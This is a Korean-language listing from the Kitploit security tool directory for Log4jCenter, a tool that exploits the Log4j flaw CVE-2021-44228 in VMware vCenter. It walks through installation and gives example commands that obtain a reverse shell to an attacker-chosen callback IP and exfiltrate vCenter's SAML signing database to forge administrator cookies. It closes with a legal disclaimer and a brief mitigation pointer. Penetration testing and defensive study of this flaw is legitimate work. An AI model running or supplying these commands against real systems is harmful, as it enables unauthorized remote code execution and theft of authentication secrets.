Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Log4jCenter — vCenter에서 CVE-2021-44228을 악용하여 원격 코드 실행 및 그 이상을 수행합니다. | Kitploit
도구/GitHubGitHub/puzzlepeaches/log4jcenter
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration TestingCommand and Control
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

vCenter에서 CVE-2021-44228을 악용하여 원격 코드 실행 및 그 이상을 수행합니다.

저장소 보기
105194년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Log4jCenter

vCenter에서 CVE-2021-44228을 악용하여 원격 코드 실행 등을 수행하는 도구입니다. 아래 블로그 게시물에서 자세한 악용 과정을 확인할 수 있습니다:

  • VMWare vCenter에서 Log4j 취약점을 악용하는 방법

왜?

이 취약점에 대한 개념 증명(PoC)은 여기저기 흩어져 있고 수동으로 수행해야 합니다. 이 저장소는 악용 과정을 자동화하고, 악용 후에 가능한 추가 공격 경로를 보여줍니다.

설치

이 저장소는 수동으로 사용하거나 Docker로 사용할 수 있습니다.

수동 설치

악용 도구를 다운로드하고 실행하려면 다음 단계를 수행하십시오. 먼저 공격자 호스트에 Java와 Maven이 설치되어 있는지 확인하십시오. Debian 기반 운영 체제에서 apt를 사용하여 설치하려면 다음 명령을 실행하십시오:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHub 저장소를 클론하고 모든 Python 요구 사항을 설치하십시오:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

Log4jCenter 저장소의 루트에서 아래 명령을 사용하여 Rogue-Jndi 프로젝트를 컴파일하십시오:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker 설치

먼저 공격 호스트에 Docker가 설치되어 있는지 확인하십시오. (이 과정은 안내하지 않겠습니다)

그런 다음 다음 명령을 실행하여 저장소를 클론하고 사용할 Docker 이미지를 빌드하십시오.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

컨테이너를 실행하려면 명령줄 플래그를 추가하여 다음 명령과 유사하게 실행하십시오. 예를 들어, 아래 명령은 vCenter를 악용하여 리버스 셸을 얻는 데 사용됩니다. 컨테이너는 리버스 셸을 받지 못합니다. 별도의 셸 세션에서 ncat 리스너를 생성해야 합니다:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

사용법

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

예제

로컬 시스템에 설치된 도구를 사용하여 리버스 셸을 얻으려면:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

Docker 컨테이너 내에서 SAML 서명 데이터베이스를 외부로 유출하려면:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

참고 사항

  • 알 수 없는 이유로 리버스 셸 페이로드가 스크립트를 처음 실행한 후에는 실행되지 않을 수 있습니다. 콜백을 받으려면 악용 도구를 몇 번 실행해야 할 수도 있습니다. 이 문제를 조사하고 향후 릴리스에서 수정 사항을 포함할 예정입니다.
  • utils 디렉터리에는 vcenter_saml_login 저장소가 포함되어 있습니다. 이 도구를 e 플래그와 함께 사용하여 vCenter SAML 서명 데이터베이스를 유출하고 vSphere용 관리 로그인 쿠키를 생성할 수 있습니다. 요구 사항을 별도로 설치해야 합니다.
  • 방어자의 경우 곧 제공될 패치 또는 여기에 설명된 해결 방법을 사용하여 이 문제를 완화할 수 있습니다.

면책 조항

이 도구는 침투 테스트 중에 사용하도록 설계되었습니다. 사전에 상호 동의 없이 대상을 공격하기 위해 이 도구를 사용하는 것은 불법입니다. 모든 해당 지역, 주 및 연방 법률을 준수할 책임은 최종 사용자에게 있습니다. 개발자는 어떠한 책임도 지지 않으며 이 프로그램의 오용에 대해 책임을 지지 않습니다.

도구 다운로드